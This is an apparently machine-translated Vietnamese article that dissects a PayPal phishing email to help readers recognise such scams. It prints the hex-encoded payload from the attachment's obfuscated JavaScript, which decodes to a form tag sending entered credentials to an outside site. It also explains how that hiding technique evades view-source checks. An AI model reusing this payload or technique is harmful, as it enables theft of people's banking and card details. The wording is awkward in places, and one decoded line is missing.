Đừng nghĩ rằng đó chỉ là chi tiết ngân hàng quan trọng: sau khi tất cả, nếu ai đó kiểm soát thông tin đăng nhập tài khoản của bạn, họ không chỉ biết thông tin trong tài khoản đó, mà còn có thể sử dụng cùng một thông tin đăng nhập tài khoản. Và nếu họ thỏa hiệp tài khoản email của bạn, họ có thể đặt lại tất cả các mật khẩu khác của bạn.
Vì vậy, ngoài việc giữ mật khẩu mạnh mẽ và khác nhau, bạn phải luôn luôn được trên Lookout cho email giả mạo giả mạo như là điều thực sự. Trong khi hầu hết các nỗ lực lừa đảo là nghiệp dư, một số thì khá thuyết phục, vì vậy điều quan trọng là phải hiểu cách nhận ra chúng ở mức độ bề mặt cũng như cách chúng hoạt động dưới mui xe.
Hình ảnh của asirap
Kiểm tra những gì là trong Plain Sight
Email mẫu của chúng tôi, giống như hầu hết các nỗ lực lừa đảo, "thông báo" cho bạn về hoạt động trên tài khoản PayPal của bạn, trong trường hợp bình thường, sẽ đáng báo động. Vì vậy, lời gọi hành động là để xác minh / khôi phục tài khoản của bạn bằng cách gửi mọi thông tin cá nhân mà bạn có thể nghĩ đến. Một lần nữa, điều này là khá công thức.
Mặc dù chắc chắn có những ngoại lệ, nhưng mỗi email lừa đảo và lừa đảo đều được tải trực tiếp bằng cờ đỏ trong chính thư đó. Ngay cả khi các văn bản là thuyết phục, bạn thường có thể tìm thấy nhiều sai lầm rải rác khắp cơ thể tin nhắn mà chỉ ra thông điệp không phải là legit.
Nội dung thư
- “Paypal” - Trường hợp chính xác là “PayPal” (vốn P). Bạn có thể thấy cả hai biến thể được sử dụng trong tin nhắn. Các công ty rất thận trọng với thương hiệu của họ, vì vậy nó là một cái gì đó nghi ngờ như thế này sẽ vượt qua quá trình kiểm chứng.
- "Cho phép ActiveX" - Đã bao nhiêu lần bạn nhìn thấy một doanh nghiệp dựa trên web hợp pháp quy mô Paypal sử dụng một thành phần độc quyền chỉ hoạt động trên một trình duyệt duy nhất, đặc biệt là khi chúng hỗ trợ nhiều trình duyệt? Chắc chắn, ở đâu đó có một số công ty làm điều đó, nhưng đây là một lá cờ đỏ.
- "An toàn." - Chú ý cách từ này không xếp hàng ở lề với phần còn lại của đoạn văn bản. Ngay cả khi tôi kéo dài cửa sổ nhiều hơn một chút, nó không bị bọc hoặc không gian chính xác.
- “Paypal!” - Khoảng trống trước dấu chấm than trông có vẻ lúng túng. Chỉ cần một quirk khác mà tôi chắc chắn sẽ không được trong một email hợp pháp.
- “PayPal- Account Update Form.pdf.htm” - Tại sao Paypal đính kèm một “PDF” đặc biệt là khi họ chỉ có thể liên kết đến một trang trên trang web của họ? Ngoài ra, tại sao họ sẽ cố gắng ngụy trang một tệp HTML dưới dạng PDF? Đây là lá cờ đỏ lớn nhất trong số họ.
Tiêu đề thư
- Địa chỉ từ là [email protected].
- Địa chỉ đến bị thiếu. Tôi không bỏ trống điều này, nó đơn giản không phải là một phần của tiêu đề thư tiêu chuẩn. Thông thường một công ty có tên của bạn sẽ cá nhân hóa email cho bạn.
Tệp đính kèm
Khi tôi mở tệp đính kèm, bạn có thể thấy ngay bố cục không chính xác vì thiếu thông tin kiểu. Một lần nữa, tại sao PayPal sẽ gửi email một biểu mẫu HTML khi họ có thể chỉ cần cung cấp cho bạn một liên kết trên trang web của họ?
Chú thích: chúng tôi đã sử dụng trình xem tệp đính kèm HTML được tích hợp sẵn của Gmail cho điều này, nhưng chúng tôi khuyên bạn KHÔNG nên mở tệp đính kèm từ những kẻ lừa đảo. Không bao giờ. Không bao giờ. Chúng thường chứa các khai thác sẽ cài đặt trojans trên PC của bạn để ăn cắp thông tin tài khoản của bạn.
Cuộn xuống một chút, bạn có thể thấy rằng biểu mẫu này không chỉ yêu cầu thông tin đăng nhập PayPal của chúng tôi, mà còn cho thông tin ngân hàng và thẻ tín dụng. Một số hình ảnh bị hỏng.
Phân tích kỹ thuật
Mặc dù nó khá rõ ràng dựa trên những gì ở trong tầm nhìn rõ ràng rằng đây là một nỗ lực lừa đảo, chúng tôi bây giờ sẽ phá vỡ trang điểm kỹ thuật của email và xem những gì chúng ta có thể tìm thấy.
Thông tin từ tệp đính kèm
Điều đầu tiên cần xem xét là nguồn HTML của tệp đính kèm là những gì gửi dữ liệu đến trang không có thật.
Khi xem nhanh nguồn, tất cả các liên kết xuất hiện hợp lệ khi chúng trỏ đến "paypal.com" hoặc "paypalobjects.com", cả hai đều hợp pháp.
Thông tin từ Tiêu đề Email
Tiếp theo, chúng ta sẽ xem xét các tiêu đề thư email thô. Gmail cung cấp tính năng này thông qua tùy chọn Hiển thị menu gốc trên thư.
Dữ liệu đi đâu?
Vì vậy, chúng tôi đã xác định rõ ràng đây là một email lừa đảo và thu thập một số thông tin về nơi thư bắt nguồn từ đó, nhưng về nơi dữ liệu của bạn được gửi đi thì sao?
Để thấy điều này, trước tiên chúng ta phải lưu tệp đính kèm HTM vào màn hình và mở trong trình soạn thảo văn bản. Cuộn qua nó, mọi thứ dường như theo thứ tự ngoại trừ khi chúng ta tới một khối Javascript trông đáng ngờ.
Bất cứ lúc nào bạn nhìn thấy một chuỗi lộn xộn lớn các chữ cái và số dường như ngẫu nhiên được nhúng trong một khối Javascript, nó thường là một cái gì đó đáng ngờ. Nhìn vào mã, biến "x" được đặt thành chuỗi lớn này và sau đó được giải mã thành biến "y". Kết quả cuối cùng của biến "y" sau đó được ghi vào tài liệu dưới dạng HTML.
Vì chuỗi lớn được tạo thành từ các số 0-9 và các chữ cái a-f, nó rất có thể được mã hóa thông qua một chuyển đổi đơn giản thành dạng mã ASCII thành Hex:
3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e
Dịch sang:
Nó không phải là một sự trùng hợp ngẫu nhiên mà điều này giải mã thành một thẻ biểu mẫu HTML hợp lệ mà sẽ gửi kết quả không đến PayPal, nhưng đến một trang web giả mạo.
Ngoài ra, khi bạn xem nguồn HTML của biểu mẫu, bạn sẽ thấy rằng thẻ biểu mẫu này không hiển thị vì nó được tạo động thông qua Javascript. Đây là một cách thông minh để ẩn những gì HTML thực sự đang làm nếu ai đó chỉ đơn giản là xem nguồn được tạo ra của tệp đính kèm (như chúng ta đã làm trước đó) trái với việc mở tệp đính kèm trực tiếp trong trình soạn thảo văn bản.
Cynicism là một quốc phòng tốt
Khi nói đến việc giữ an toàn trực tuyến, nó không bao giờ đau khổ để có một chút hoài nghi.
Trong khi tôi chắc chắn có nhiều cờ đỏ hơn trong email mẫu, những gì chúng tôi đã chỉ ra ở trên là các chỉ số chúng tôi đã thấy chỉ sau vài phút kiểm tra. Theo giả thuyết, nếu mức độ bề mặt của email bắt chước 100% đối tác hợp pháp của nó, thì phân tích kỹ thuật vẫn sẽ tiết lộ bản chất thực sự của nó. Đây là lý do tại sao nó nhập khẩu để có thể kiểm tra cả những gì bạn có thể và không thể nhìn thấy.
